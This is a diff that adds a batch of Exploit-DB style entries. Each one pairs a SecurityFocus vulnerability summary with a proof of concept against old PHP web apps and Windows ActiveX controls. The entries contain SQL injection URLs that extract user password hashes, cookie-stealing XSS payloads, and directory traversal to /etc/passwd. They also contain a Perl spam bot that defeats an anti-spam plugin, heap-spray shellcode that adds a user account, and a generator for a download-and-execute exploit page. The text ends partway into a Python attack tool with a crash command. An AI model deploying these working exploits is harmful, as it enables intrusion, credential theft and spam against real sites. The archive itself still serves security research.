        print $op1 . " + " . $op2 . " = " . ($op1+$op2) . "\n";
        close(INFILE);
--- a/platforms/php/webapps/31030.pl
+++ b/platforms/php/webapps/31030.pl
@ -0,0 +1,102 @@
 source: http://www.securityfocus.com/bid/27291/info
 SpamBam is prone to a security-bypass vulnerability because client-accessible data can be used to calculate verification keys.
 Attackers can exploit this issue to submit arbitrary form data via automated scripts and distribute spam.
 #!/usr/bin/perl -w
 # Defeating SpamBam exploit
 # by Jose Palazon (josem.palazon@gmail.com) (a.k.a. palako)
 # Vulnerable software:
 # SpamBam (http://wordpress.org/extend/plugins/spambam/) by Gareth Heyes
 # Vulnerability:
 # No matter how hard you ofuscate or encrypt your code, never, under no 
 circunstances, rely
 # any security aspect on the client. Never!
 # How the plugin works:
 # It generates a pseudo-random code both on the client and the server to 
 generate a key.
 # On form submit, both key values are checked and they should match to 
 allow comment insertion.
 #How the exploit works:
 # It does nothing but acting as a client. It parses the html, extracts 
 the javascript, process it
 # to calculate the key and fills the hidden field with it.
 # Solution:
 # Sorry guys but there's no fix for this. It'ss just a design flaw.
 use WWW::Mechanize;
 use JavaScript::SpiderMonkey;
 my $tmpContent;
 my $javascriptCode;
 my $spamBamKey;
 die ("Usage: spambam.pl <post url> <author> <email> <comment>\n") unless 
 $ARGV[3];
 my $url = $ARGV[0];
 my $author = $ARGV[1];
 my $email = $ARGV[2];
 my $comment = $ARGV[3];
 my $mech = WWW::Mechanize->new( autocheck => 1 );
 $mech->get($url);
 # WWW::Mechanize doesn't support javascript, so the field 
 comment_spambamKey won't be
 # recognized by $mech->field. Thus, I'll make an update_html adding the 
 field, and for
 # this purpose I save first the original contents. Indeed, substitition 
 occurs via the
 # javascript callback function "extractKey"
 $tmpContent = $mech->content;
 # Eliminate carriage returns to apply sed. Later I'll have to restore 
 them
 # to execute the javascript code, as not every line is semicolon 
 terminated.
 # That's the reason of the __WHO_BAMS_WHO__ string.
 $_ = $mech->content;
 s/\n/__WHO_BAMS_WHO__/g; 
 # Extract the javascript code and the name of the variable where the key 
 is going to be calculated
 /<script type="text\/javascript">(.*)document\.write\('<input 
 type="hidden" name="comment_spambamKey" value="'\+(.*)\+'">'\);/g; 
 $javascriptCode = $1;
 $spamBamKey = $2;
 # Add the javascript instruction  which will comunicate the key to the 
 perl code.
 $javascriptCode .= "\nextractKey($spamBamKey);";
 my $js = JavaScript::SpiderMonkey->new();
 $js->init();  # Initialize Runtime/Context
 # Define perl callback for extracting the key from the javascript code
 $js->function_set("extractKey", sub { $tmpContent =~ s/<\/form>/<input 
 type=\"hidden\" name=\"comment_spambamKey\" value=\"@_\"><\/form>/; });
 # Restore Carriage returns and execute javascript code
 $javascriptCode =~ s/__WHO_BAMS_WHO__/\n/g;
 my $rc = $js->eval($javascriptCode); 
 $js->destroy();
 # Process form
 $mech->update_html( $tmpContent );
 $mech->form_number(1);
 $mech->field("author", $author);
 $mech->field("email", $email);
 $mech->field("comment", $comment);
 $mech->submit();
 printf("Check it. Comment should have been added\n");
--- a/platforms/php/webapps/31034.txt
+++ b/platforms/php/webapps/31034.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/27323/info
 MyBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 Versions prior to MyBB 1.2.11 are vulnerable. 
 http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts&mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,7+UNION+ALL+SELECT+1,(SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27)+FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2
 http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=allreports&rid=0'+UNION+SELECT+waraxe--+
 http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_multimovethreads&moveto=2&threads=war|axe 
--- a/platforms/php/webapps/31035.txt
+++ b/platforms/php/webapps/31035.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/27335/info
 Clever Copy is prone to multiple input-validation vulnerabilities, including two SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
 Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 These issues affect Clever Copy 3.0; other versions may also be affected.
 http://www.example.com/cc/postcomment.php?ID=&#039;/**/union/**/select/**/1,2,3,4,5,6,concat(char(117,115,101,114,110,97,109,101,61),username),concat(0x70617373776f72643d,password),9,10,11,12,13,14,15,16,17/**/from/**/cc_users/**/where/**/theid=1/*
 http://www.example.com/cc/gallery.php?album=&#039;/**/union/**/select/**/null,password,null,null,username,null,null,null/**/from/**/cc_users/**/where/**/theid=1/*
 http://www.example.com/cc/gallery.php?album=<script>alert(&#039;xss&#039;)</script>
--- a/platforms/php/webapps/31037.txt
+++ b/platforms/php/webapps/31037.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27346/info
 phpAutoVideo is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
 Attackers can exploit these issues to execute arbitrary code within the context of the webserver process, steal cookie-based authentication credentials, and launch other attacks.
 phpAutoVideo 2.21 is vulnerable; other versions may also be affected. 
 http://www.example.com/[Target.il]/[Path]/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=[SH3LL]
--- a/platforms/php/webapps/31038.txt
+++ b/platforms/php/webapps/31038.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27346/info
 phpAutoVideo is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
 Attackers can exploit these issues to execute arbitrary code within the context of the webserver process, steal cookie-based authentication credentials, and launch other attacks.
 phpAutoVideo 2.21 is vulnerable; other versions may also be affected. 
 http://www.example.com/[Target.il]/[Path]/index.php?cat=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
--- a/platforms/php/webapps/31041.txt
+++ b/platforms/php/webapps/31041.txt
@ -0,0 +1,20 @@
 source: http://www.securityfocus.com/bid/27361/info
 bloofoxCMS is prone to a directory-traversal vulnerability, a SQL-injection vulnerability, and an authentication-bypass vulnerability.
 The SQL-injection vulnerability occurs because the application fails to sufficiently sanitize user-supplied data to the 'username' parameter of the 'class_permissions.php' script before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 The authentication-bypass vulnerability stems from a lack of input-validation mechanisms in the 'system/class_permissions.php' file. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
 The directory-traversal vulnerability occurs because the application fails to properly sanitize user-supplied input data to the 'file' parameter of 'file.php'. The attacker's input would consist of '../' directory-traversal sequences. Successful exploits could allow the attacker to access the contents of potentially sensitive files on the affected computer. Information obtained may help the attacker launch other attacks against the system.
 bloofoxCMS 0.3 is vulnerable to these issues; previous versions may be affected as well. 
 Username: admin' or 1=1 /*
 Password: something
 An example for the directory-traversal vulnerability was provided:
 GET: http://www.example.com/bloofoxCMS_0.3/file.php?file=../../system/class_mysql.php
--- a/platforms/php/webapps/31044.txt
+++ b/platforms/php/webapps/31044.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27382/info
 singapore Modern template is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 Modern 1.3.2 and prior versions are reported vulnerable. Reports indicate that Modern 1.3.2 ships with singapore 0.10.1 by default. 
 http://www.example.com/[singapore_path]/default.php?gallery="><script>alert(document.cookie);</script> 
--- a/platforms/php/webapps/31045.txt
+++ b/platforms/php/webapps/31045.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27383/info
 Small Axe Weblog is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
 An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
 This issue affects Small Axe Weblog 0.3.1; other versions may also be vulnerable.
 http://www.example.com/inc/linkbar.php?ffile=http://www.example2.com 
--- a/platforms/php/webapps/31048.txt
+++ b/platforms/php/webapps/31048.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/27397/info
 PacerCMS is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
 A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
 These issues affect versions prior to PacerCMS 0.6.1.
 NOTE: To exploit these issues, the attacker may require 'staff member' access.
 http://www.example.com/pacercms/siteadmin/article-edit.php?id=[SQL] 
--- a/platforms/php/webapps/31049.txt
+++ b/platforms/php/webapps/31049.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27401/info
 DeluxeBB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 This issue affects DeluxeBB 1.1; other versions may also be vulnerable. 
 http://www.example.com/path/templates/default/admincp/attachments_header.php?lang_listofmatches=<script>alert("XSS")</script> 
--- a/platforms/php/webapps/31060.txt
+++ b/platforms/php/webapps/31060.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27459/info
 Drake CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 Drake CMS 0.4.9 is vulnerable; other versions may also be affected.
 http://www.example.com/[path]/index.php?option="'><IFRAME%20SRC="javascript:alert('XSS');"></IFRAME>&Itemid=12 
--- a/platforms/php/webapps/31061.txt
+++ b/platforms/php/webapps/31061.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27460/info
 The 'trixbox' product is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 These issues affect trixbox 2.4.2.0; earlier versions may also be vulnerable. 
 http://www.example.com/user/index.php?"><script>alert('xss')</script>
--- a/platforms/php/webapps/31062.txt
+++ b/platforms/php/webapps/31062.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27460/info
 The 'trixbox' product is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 These issues affect trixbox 2.4.2.0; earlier versions may also be vulnerable. 
 http://www.example.com/maint/index.php?"><script>alert('xss')</script> 
--- a/platforms/php/webapps/31063.txt
+++ b/platforms/php/webapps/31063.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27461/info
 WebCalendar is prone to multiple HTML-injection and cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
 Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials. The attacker could also exploit the HTML-injection issues to control how the site is rendered to the user; other attacks are also possible.
 These issues affect WebCalendar 1.1.6; other versions may also be vulnerable. 
 http://www.example.com/pref.php?>&#039;"><script>alert(&#039;XSS&#039;)</script>
--- a/platforms/php/webapps/31064.txt
+++ b/platforms/php/webapps/31064.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27461/info
 WebCalendar is prone to multiple HTML-injection and cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
 Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials. The attacker could also exploit the HTML-injection issues to control how the site is rendered to the user; other attacks are also possible.
 These issues affect WebCalendar 1.1.6; other versions may also be vulnerable. 
 http://www.example.com/search.php?adv=>"&#039;><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>
--- a/platforms/php/webapps/31065.txt
+++ b/platforms/php/webapps/31065.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27462/info
 F5 BIG-IP Application Security Manager is prone to a cross-site scripting vulnerability because the web management interface fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 This issue affects F5 BIG-IP Application Security Manager 9.4.3; other versions may also be vulnerable. 
 https://(target)/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+
--- a/platforms/php/webapps/31066.txt
+++ b/platforms/php/webapps/31066.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27470/info
 The MOStlyCE module for Mambo is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected. 
 http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=<script>alert(document.cookie)</script> 
--- a/platforms/php/webapps/31067.txt
+++ b/platforms/php/webapps/31067.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27471/info
 ClanSphere is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
 An attacker can exploit this vulnerability using directory-traversal strings to access potentially sensitive information that may aid in further attacks.
 ClanSphere 2007.4.4 is vulnerable to this issue; other versions may also be affected. 
 http://www.example.com/install.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 
--- a/platforms/php/webapps/31068.txt
+++ b/platforms/php/webapps/31068.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27472/info
 The MOStlyCE module for Mambo is prone to an arbitrary-file-upload vulnerability because the application fails to sufficiently sanitize user-supplied input.
 Exploiting this issue could allow an attacker to upload and execute arbitrary script code in the context of the affected webserver process.
 MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected. 
 http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder= 
--- a/platforms/php/webapps/31069.txt
+++ b/platforms/php/webapps/31069.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27473/info
 eTicket is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 eTicket 1.5.6-RC4 is vulnerable; prior versions may also be affected.
 http://www.example.com/index.php/"><script>alert('XSS')</script> 
--- a/platforms/windows/local/31036.txt
+++ b/platforms/windows/local/31036.txt
@ -0,0 +1,24 @@
 source: http://www.securityfocus.com/bid/27341/info
 CORE FORCE Firewall and Registry modules are prone to multiple local kernel buffer-overflow vulnerabilities because the software fails to adequately verify user-supplied input.
 Local attackers can exploit these issues to cause denial-of-service conditions. Attackers may also be able to escalate privileges and execute arbitrary code, but this has not been confirmed.
 These issues affect versions up to and including CORE FORCE 0.95.167.
 All the vulnerabilities can be reproduced by running a combination of
 DC2 and BSODHook tools.
 Step by step instructions:
 - Get DC2.exe (Driver Path Verifier) from the latest Windows Driver Kit.
 - Login as unprivileged user.
 - Run "dc2 /hct /a".
 - Get BSODHook.exe from Matousec 
 http://www.matousec.com/projects/windows-personal-firewall-analysis/plague-in-security-software-drivers.php
 - Click on "Load Driver" then click on "Find SSDT hooks" then "Add to
 probe list" and then "GO".
--- a/platforms/windows/remote/31039.txt
+++ b/platforms/windows/remote/31039.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27358/info
 BitDefender Update Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
 Exploiting this issue allows an attacker to access potentially sensitive information that could aid in further attacks.
 BitDefender Security for File Servers, BitDefender Enterprise Manger, and other BitDefender products that include the Update Server are vulnerable. This issue affects Update Server when running on Windows; Linux and UNIX variants may also be affected. 
 echo -e "GET /../../boot.ini HTTP/1.0\r\n\r\n" | nc <server> <port> 
--- a/platforms/windows/remote/31040.html
+++ b/platforms/windows/remote/31040.html
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27360/info
 Surveillix DVR 'MeIpCamX.DLL' ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
 Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
 These issues affect 'MeIpCamX.DLL' 1.0.0.4; other versions may also be vulnerable. 
 <!-- Toshiba Surveillance (Surveillix) RecordSend Class (MeIpCamX.DLL 1.0.0.4) remote buffer overflow exploit (IE7/xpsp2) a demo camera: http://wb02-demo.surveillixdvrsupport.com/Ctl/index.htm?Cus?Audio codebase: http://wb02-demo.surveillixdvrsupport.com/Ctl/MeIpCamX.cab rgod-tsid-pa-he-ru-ka - stay tuned with us ... http://retrogod.altervista.org/join.html security feeds, radio streams, techno/drum & bass stations to come --> <html> <object classid='clsid:AD315309-EA00-45AE-9E8E-B6A61CE6B974' id='RecordSend' /> </object> <script language="javascript"> ///add su one, user: sun pass: tzu shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" + "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" + "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" + "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" + "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" + "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" + "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" + "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" + "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" + "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" + "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" + "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" + "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" + "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" + "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" + "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" + "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" + "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" + "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" + "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" + "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" + "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" + "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" + "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" + "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" + "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" + "%u7734%u4734%u4570"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<444;i++){memory[i] = block+shellcode} //thx to Solar Designer and metasploit crew, is always intended puf=""; for (i=0;i<28;i++){puf = puf + unescape("%0e")} //no more than 28, otherwise you fall in seh tricks RecordSend.SetPort(puf); //SetIpAddress method is vulnerable too, check by yourself </script> </html>
--- a/platforms/windows/remote/31046.cpp
+++ b/platforms/windows/remote/31046.cpp
@ -0,0 +1,80 @@
 source: http://www.securityfocus.com/bid/27393/info
 GlobalLink 'GLChat.ocx' ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
 Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
 GlobalLink 'GLChat.ocx' ActiveX control 2.5.1.33 is reported affected by this issue; other versions may also be vulnerable. 
 //date:2007.10 fuzz by Knell@Knell-0xSec QQ:415964  
 #define _CRT_SECURE_NO_DEPRECATE
 #include <windows.h>
 #include <stdio.h>
 const unsigned char shellcode[174] = 
 {
 0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A, 
 0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F, 
 0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1, 
 0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C, 
 0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41, 
 0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03, 
 0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B, 
 0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC, 
 0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB, 
 0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00, 
 0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
 };
 const char* script1 = \
 "<html><body><object id=\"sb\" classid=\"clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69\"></object><script>"
 "var shellcode = unescape(\"";
 const char* script2 = \
 "\");"
 "bigblock = unescape(\"%u9090\");"
 "headersize = 20;"
 "slackspace = headersize + shellcode.length;"
 "while ( bigblock.length < slackspace ) bigblock += bigblock;"
 "fillblock = bigblock.substring(0, slackspace);"
 "block = bigblock.substring(0, bigblock.length - slackspace);"
 "while(block.length + slackspace < 0x40000) block = block + block + fillblock;"
 "memory = new Array();"
 "for (x=0; x< 300; x++) memory[x] = block + shellcode;"
 "var zhen = '\\x0a';"
 "while (zhen.length < 4057) zhen += '\\x0a\\x0a\\x0a\\x0a';"
 "sb.ChatRoom = zhen;"
 "</script>"
 "</body>"
 "</html>";
 int main(int argc, char* argv[])
 {
 if ( argc != 2 )
 {
 printf("usage:knell.exe down&exec-url\njÖÊ½çlobalLink)GLChat.ocx ActiveX Control BoF exploit\n bug fuzz by knell 2007.10\n");
 return -1;
 }
 FILE *file = fopen("knell.html", "w+");
 if ( file == NULL )
 {
 printf("create 'knell.html' failed!\n");
 return -2;
 }
 fprintf(file, "%s", script1);
 for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
 fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);
 const unsigned l = strlen(argv[1]);
 for ( unsigned j = 0; j < l; j += 2 )
 fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);
 fprintf(file, "%s", script2);
 fclose(file);
 printf("make 'knell.html' successed!\n");
 return 0;
 } 
--- a/platforms/windows/remote/31056.py
+++ b/platforms/windows/remote/31056.py
@ -0,0 +1,334 @@
 source: http://www.securityfocus.com/bid/27423/info
 HFS (HTTP File Server) is prone to multiple security vulnerabilities, including cross-site scripting issues, an information-disclosure issue, an arbitrary file-creation issue, a denial-of-service issue, a username-spoofing issue, and a logfile-forging issue.
 A successful exploit could allow an attacker to deny service to legitimate users, create and execute arbitrary files in the context of the webserver process, falsify log information, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible. 
 #!/usr/bin/python
 """
 ----------------------------------------------------------------
 HFSHack 1.0b (By Felipe M. Aragon And Alec Storm )
 ----------------------------------------------------------------
 * CVE-2008-0409 - Cross-Site Scripting (XSS) and Host Field XSS
 * CVE-2008-0410 - Information Disclosure Vulnerability
 Affected Versions: HFS 2.0 to and including 2.3(Beta Build 174)
 http://www.syhunt.com/advisories/hfs-1-template.txt
 * CVE-2008-0405 - Arbitrary File/Folder Creation Vulnerability
 * CVE-2008-0406 - Denial of Service (DoS) Vulnerability
 Affected Versions: HFS 2.2 to and including 2.3(Beta Build 174)
 http://www.syhunt.com/advisories/hfs-1-log.txt
 * CVE-2008-0407 - Username Spoofing Vulnerability
 * CVE-2008-0408 - Log Forging / Injection Vulnerability
 Affected Versions: HFS 1.5g to and including 2.3(Beta Build
 174); and possibly HFS version 1.5f
 http://www.syhunt.com/advisories/hfs-1-username.txt
 Vulnerabilities found by Syhunt (http://www.syhunt.com)
 Sandcat can also identify these issues:
 http://www.syhunt.com/sandcat
 """
 import urllib2, sys, re, commands, StringIO, string, base64
 host = '127.0.0.1' # Default Host
 help = ('\n'
 'open [hostname]\n'
 '	This should be called first (unless you want the default host)\n\n'
 'checkdos\n'
 '	Performs the Log DoS Attack (Makes the server crash)\n\n'
 'checkxss\n'
 '	Checks for the presence of the Template XSS Vulnerability\n\n'
 'manipf [localfilename] [remotefilename]\n'
 '	Appends content of a local file to a remote file. Examples:\n'
 '	manipf inject.html index.html or ..\\..\index.html\n'
 '	Note: If the file does not exists, it will be created.\n\n'
 'maniplog [localfilename]\n'
 '	Injects content of a local file to the HFS log panel and file\n\n'
 'mkd [dirname]\n'
 '	Creates directories. Examples:\n'
 '	mkd Test or ..\\..\\Windows\\Test\n\n'
 'symbols\n'
 '	Forces HFS to reveal details about the server\n\n'
 'ver\n'
 '	Forces HFS to show its version and build, and displays which\n\n'
 '	HFSHack commands are available for it\n'
 'quit\n'
 '	Exits this application'
 '\r\n')
 readme = (
 '(c) 2008 Syhunt Security. All rights reserved.\n\n'
 'This tool is provided ''as-is'', without any expressed or implied\n'
 'warranty. In no event will the author be held liable for any\n'
 'damages arising from the use of this tool.\n\n'
 'Permission is granted to anyone to use this tool, and to alter\n'
 'it and redistribute it freely, subject to the following\n'
 'restrictions:\n\n'
 '1. The origin of this tool must not be misrepresented, you must\n'
 '   not claim that you wrote the original tool.\n\n'
 '2. Altered source versions must be plainly marked as such, and\n'
 '   must not be misrepresented as being the original plugin.\n\n'
 '3. This notice may not be removed or altered from any source\n'
 '   distribution.\n\n'
 'If you have any questions concerning this license, please email\n'
 'contact _at_ syhunt _dot_ com\n'
 )
 about = (
 '----------------------------------------------------------------\n'
 ' Syhunt HFSHack 1.0b\n'
 '----------------------------------------------------------------\n\n'
 'This exploit tool should be used only by system administrators\n'
 '(or other people in charge).\n\n'
 'Type "readme" and read the text before continuing\n\n'
 'If you have already read it, type "help" to view a list of\n'
 'commands.'
 )
 # Extra Details to Obtain
 symbol_list = (
 'connections;Current number of connections to HFS',
 'timestamp;Date and time of the server',
 'uptime;Uptime',
 'speed-out;Current outbound speed',
 'speed-in;Current inbound speed',
 'total-out;Total amount of bytes sent',
 'total-downloads;Total amount of bytes sent',
 'total-hits;Total Hits',
 'total-uploads;Total Uploads',
 'number-addresses;Current number of connected clients (IPs)',
 'number-addresses-ever;Number of unique IPs ever connected',
 'number-addresses-downloading;Current number of downloading clients (IPs)',
 )
 # Affected Versions
 re_200801161 = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b]|2.3 beta)'
 re_200801162 = '^HFS(.*?)(2.2$|2.2[a-b]|2.3 beta)'
 re_200801163 = '^HFS(.*?)(1.5[f-g]|1.6|2.[0-1]|2.2$|2.2[a-b]|2.3 beta)'
 re_cangetver = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b])'
 # Common Messages
 msg_par_mis = 'Parameter(s) missing.'
